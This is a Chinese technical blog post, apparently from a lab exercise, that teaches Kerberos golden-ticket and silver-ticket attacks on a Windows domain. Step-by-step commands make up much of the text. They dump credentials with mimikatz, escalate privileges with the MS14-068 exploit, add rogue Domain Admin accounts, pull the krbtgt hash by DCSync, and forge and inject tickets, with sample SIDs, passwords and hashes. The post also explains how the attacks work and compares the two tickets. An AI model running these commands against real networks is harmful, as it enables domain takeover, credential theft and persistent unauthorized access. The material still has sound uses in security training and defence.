域内攻击之金票和银票及原理介绍

最新推荐文章于 2024-05-14 11:00:23 发布
最新推荐文章于 2024-05-14 11:00:23 发布
阅读量2.9k 收藏 11
点赞数 3
文章标签: 信息安全 安全漏洞 python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43733912/article/details/109476519
版权

黄金票据和白银票据攻击及其原理介绍

 

 

票据传递攻击

这里介绍域内常用的两种攻击方式:黄金票据Golden ticket、白银票据SILVER TICKET

另外,学习过Kerberos认证过程的同学会更加容易的理解两种票据攻击的原理,没有看过Kerberos认证的同学,我推荐还是去看看我之前写的 Kerberos认证过程

相关应用

Ms14-068
PSexec
mimikatz

金票Golden ticket

原理

在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个
Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。

特点

不需要与AS进行交互,需要用户krbtgt的Hash

具体操作介绍

一、伪造凭据,提升域内普通用户的权限

我们现在以一个本地administrator用户登录域内的一个主机中。

通过命令:net config workstation,可知域名为:cyberpeace和其他信息。

通过命令:nltest /dsgetdc:域名,可知DC主机名为:scene。

上传mimikatz,以管理员权限运行CMD,再去执行mimikatz:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

打开生成的log.txt可以看到有一个域内用户devuser,且密码是HOTdev123456

使用用户devuser登录到域内,whoami查看下当前用户为devuser:

这里利用MS14-068来提权,先检查下是否有MS14-068, CVE编号CVE-2014-6324,补丁为 3011780 : systeminfo |find "3011780",如果返回为空就说明没有打补丁,存在漏洞,需要注意的是域内普通用户提权成功后是有时效性的。

执行:dir \scene.cyberpeace.com\c$,提醒权限不够:

上传mimikatz和MS14-068提权工具,whoami /user或者whoami/all查看devuser用户的suid:

使用MS14-068伪造票据:
执行命令:C:\MS14-068>MS14-068.exe -u devuser@cyberpeace.com -p HOTdev123456 -s S-1-5-21-9 7341123-1865264218-933115267-1108 -d scene.cyberpeace.com,会在当前目录下生成一个凭证。

使用方法:

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

使用mimikatz清空之前缓存的凭证,导入伪造的凭证:

mimikatz # kerberos::purge  //清空票据
mimikatz # kerberos::ptc 票据文件地址

再输入dir \\scene.cyberpeace.com\c$,发现访问成功,现在我们有域管的权限:

添加域管用户aaa:

net user aaa Qwe123... /add /domain
net group "Domain Admins" aaa /add /domain

二、伪造金票

伪造金票的所需条件
1、域名称
2、域的SID值
3、域的KRBTGT账号的HASH
4、伪造任意用户名

登录aaa域管用户,执行whoami可以看到是aaa用户:

使用一下命令导出用户krbtgt的hash:

mimikatz(commandline) # privilege::debug
mimikatz(commandline) # lsadump::dcsync /domain:cyberpeace.com /all /csv
mimikatz(commandline) # lsadump::dcsync /domain:cyberpeace.com /user:krbtgt

再执行以下命令可以看到krbtgt用户的SID:

image.png

利用mimikatz生成金票生成.kirbi文件并保存:

mimikatz.exe "kerberos::golden /admin:system /domain:cyberpeace.com /sid:S-1-5-21-97341123-1865264218-933115267 /krbtgt:95972cdf7b8dde854e74c1871f6d80a0 /ticket:ticket.kirbi" exit

/admin:伪造的用户名
/domain:域名称
/sid:SID值,注意是去掉最后一个-后面的值
/krbtgt:krbtgt的HASH值
/ticket:生成的票据名称    //不是写入内存中的命令!

三,金票的使用(普通域账户,利用黄金票据,创建域管账户)

登录域内普通用户,通过mimikatz中的kerberos::ptt功能将ticket.kirbi导入内存中。

mimikatz # kerberos::purge         
mimikatz # kerberos::ptt ticket.kirbi

此时尝试创建一个ccc的域管账号,命令执行成功:

 

银票SILVER TICKET

原理

如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。
在Kerberos认证的第三部,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。
所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。

特点

1.不需要与KDC进行交互 2.需要server的NTLM hash

具体操作介绍

一、伪造凭据,提升域内普通用户的权限

我们现在以一个本地administrator用户登录域内的一个主机中。

通过命令:net config workstation,可知域名为:cyberpeace和其他信息

通过命令:nltest /dsgetdc:域名,可知DC主机名为:scene。

上传mimikatz,以管理员权限运行CMD,再去执行mimikatz:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

打开生成的log.txt可以看到有一个域内用户Hellen,且密码是Hellen1818

使用用户Hellen登录到域内,whoami查看下当前用户为Hellen:

同样先检查下是否有MS14-068漏洞

执行:dir \scene.cyberpeace.com\c$,提醒权限不够:

上传mimikatz和MS14-068提权工具,whoami /user或者whoami/all查看devuser用户的suid:

使用MS14-068伪造票据:
执行命令:MS14-068.exe -u Hellen@cyberpeace.com -p Hellen1818 -s S-1-5-21-2718660907-658632824-2072795563-1110 -d DomainControl.cyberpeace.com,会在当前目录下生成一个凭证。

使用方法:

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

使用mimikatz清空之前缓存的凭证,导入伪造的凭证:

mimikatz # kerberos::purge  //清空票据
mimikatz # kerberos::ptc 票据文件地址

image.png

再输入dir \\scene.cyberpeace.com\c$,发现访问成功,现在我们有域管的权限:

添加域管用户ccc:

net user ccc Qwe1234/add /domain
net group "Domain Admins" cccc /add /domain

二、伪造银票

登录上面创建的域管用户,用管理员权限打开CMD,cd 到 mimikatz 存放的目录,去执行mimikatz的命令,得到SID和NTLM,

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

把HASH文件保存到本地,在重新登录到域内机器的本地账户,将hash文件和mimikatz复制进去:
先使用mimikatz清空票据,再导入伪造的票据,具体伪造票据的命令:

kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.cyberpeace.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt

使用方法:
kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLM Hash> /user:<用户名> /ptt

其中的用户名可以随便写

服务类型可以从以下内容中来进行选择,因为我们没有TGT去不断申请ticket,所以只能针对某一些服务来进行伪造

 

测试一下,成功执行dir \\scene.cyberpeace.com\c$ ,并且可以创建域管账号:

金票和银票的区别

获取的权限不同

金票:伪造的TGT,可以获取任意Kerberos的访问权限
银票:伪造的ST,只能访问指定的服务,如CIFS

认证流程不同

金票:同KDC交互,但不同AS交互
银票:不同KDC交互,直接访问Server

加密方式不同

金票:由krbtgt NTLM Hash 加密
银票:由服务账号 NTLM Hash 加密

热爱、学习
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kerberos的黄金票据详解
weixin_30642267的博客
12-27 1094
0x01黄金票据的原理和条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到控制器以获得服务票据。 Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由Kerberos帐户(KRBTGT)加密和签名的。TGT仅用...
渗透--金银票据问题
Vdieoo的博客
10-30 1188
金票据 伪造凭据,提升内普通用户权限 以admin用户登入任意一台内主机 收集信息 命令有:net config workstation,可以看到名为:cyberpeace。 nltest /dsgetdc:名,可以看到控主机名为:scene。 以admin权限运行mimikztz mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt 找...
vulnerable-AD:创建一个易受攻击的活动目录,使您可以在本地实验室中测试大多数活动目录攻击
03-18
弱势广告 创建一个易受攻击的活动目录,该目录可让您测试本地实验室中的大多数活动目录攻击 主要特点 随机化攻击 全面涵盖上述攻击 您需要在安装了Active Directory的DC中运行脚本 有些攻击需要客户端工作站 支持的攻击 滥用ACL / ACE 烧烤 AS-REP烘焙 滥用DnsAdmins AD用户评论中的密码 密码喷涂 DCSync 银票 金票 哈希传递 通票 SMB签名已禁用 例子 # if you didn't install Active Directory yet , you can try Install-ADDSForest - CreateDnsDelegation: $false - DatabasePath " C:\\Windows\\NTDS " - DomainMode " 7 " - DomainName " cs.org " - DomainNe
内横向移动技术——黄金票攻击
zzgslh的博客
06-22 1625
内横向移动技术——黄金票攻击 一、黄金票攻击介绍金票据(golden ticket)攻击,是一种为任意用户生成TGT票据的方法,属于一种后门。黄金票据生成,是生成有效的TGT Kerberos票据,并且不受TGT生命周期的影响(TGT默认10小时,最多续订7天),那么,这里可以为任意用户生成黄金票据,就可以为管理员生成TGT,普通用户就可以变成管理员。 二、Kerberos认证流程 Windows 的认证协议主要有两种,一种是 NTLM 认证,另一种是 Kerberos认证。 这里主要简
渗透之票据传递攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-13 400
Kerberos 认证并不是天衣无缝的,这其中也会有各种漏洞能够被我们利用,比如我们常说的 MS14-068、黄金票据、白银票据等就是基于Kerberos协议进行攻击的。下面我们便来大致介绍一下Kerberos 认证中的相关安全问题。
内网渗透:三、Kerberos协议及票据(黄金和白银)伪造
liu_jia_liang的博客
02-20 3352
一、Kerberos协议 kerberos(Secure network authentication system)中文叫网络安全认证系统 kerberos在进行认证过程中并不会传输用户的密码,而是通过传输tickets(票据)进行认证登陆到LDAP server。Kerberos协议主要用于计算机网络的身份鉴别,其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的凭证(ticket-granting-ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和S
内网渗透(四) | 票据传递攻击
Ms08067安全实验室
06-29 2416
票据传递攻击(Pass the Ticket,PtT)票据传递攻击(PtT)是基于Kerberos认证的一种攻击方式,常用来做后渗透权限维持。黄金票攻击利用的前提是得到了内krbtg...
金票据和白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 4558
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
Real-timeDetectionAD_ver2
05-31
检测服务器:使用基于签名的检测和机器学习检测利用管理员权限的攻击活动。 检测程序由Web API 实现。 事件日志的日志服务器:日志服务器是使用 Elactic Stack 实现的。 它实时收集控制器的事件日志并提供日志...
很好用的,评价系统初中生综合评价系统初中生综合评价系统初中生综合评价系统初中生综合评价系统
07-20
初中生综合评价系统初中生综合评价系统初中生综合评价系统初中生综合评价系统初中生综合评价系统初中生综合评价系统
cornell-big-red-hacks:2019年9月20日至22日在康奈尔大学举行的Big Red Hacks活动材料
02-22
*团队中的一个人将获得一张包括苏格兰和爱丁堡机票在内的苏格兰爱丁堡CGI大学的金票– 2020年4月 主要挑战 《代码与响应代码马拉松》呼吁学生基于云,数据和人工智能创建实用,有效和高质量的设计和应用程序,这些...
golden-ticket:(不理我)
06-24
金票 Golden Ticket 是一个围绕绕过休斯顿 ISD 学生笔记本电脑上的 Windows 组策略限制的小概念。 它失败了,但很酷。
内网渗透——黄金票据与白银票
来日可期的博客
10-11 2238
金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有内的最高权限,攻击者可以访问和控制所有内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
[内网渗透]—票据传递
Sentiment的博客
12-08 655
之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。
渗透之银票据学习
cxk
06-10 1090
银票据(silver ticket):它不需要和控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。 0x01 银票据利用条件 控计算机账户的ntlm hash 中的sid值 一台中主机 与其说是一种攻击方式,不如说是一种后门,当控权限掉后,再重新获取权限。 0x02 实战 环境 控2k3,ip:192.168.5...
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4141
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTH: PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
一文了解黄金票据和白银票
闵行小鱼塘
05-13 9755
某老哥的一次面试里问到了这个问题,故来做一番了解:该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiwi)进行了演示,该演讲提出了Kerberos协议实现过程中的设计逻辑缺陷,也就是说Windows所有使用Kerberos的场景中都可以进行此类攻击
内网渗透学习总结
m0_56171651的博客
11-28 913
内网渗透学习总结
PythonPython中变量或者函数加下划线‘_‘的含义
最新发布
yangweipeng708的博客
05-14 678
理解这些约定可以帮助Python开发者编写更清晰、更Pythonic的代码,并理解其他Python代码中的命名习惯。)通常用来指示特定的编程约定或用法,这些约定主要关乎变量和函数的可访问性以及预期的使用范围。在Python中,变量或函数前面加一个下划线(
比Meterpreter会话还要强大的会话有哪个
07-17
一个比Meterpreter会话更强大的会话是 Cobalt Strike 的 Beacon。Cobalt Strike是一款流行的渗透测试工具,其中的Beacon会话提供了更多的功能和灵活性。Beacon具有更强大的横向移动能力,可以通过多种技术(如传递、金票等)在网络中移动。它还支持多个通信协议,可以轻松地通过HTTP、DNS、SMB等进行通信。Beacon还提供了更多的后渗透功能,包括文件传输、远程桌面、嗅探等。总之,Cobalt Strike的Beacon会话是一个非常强大而且功能丰富的后渗透工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值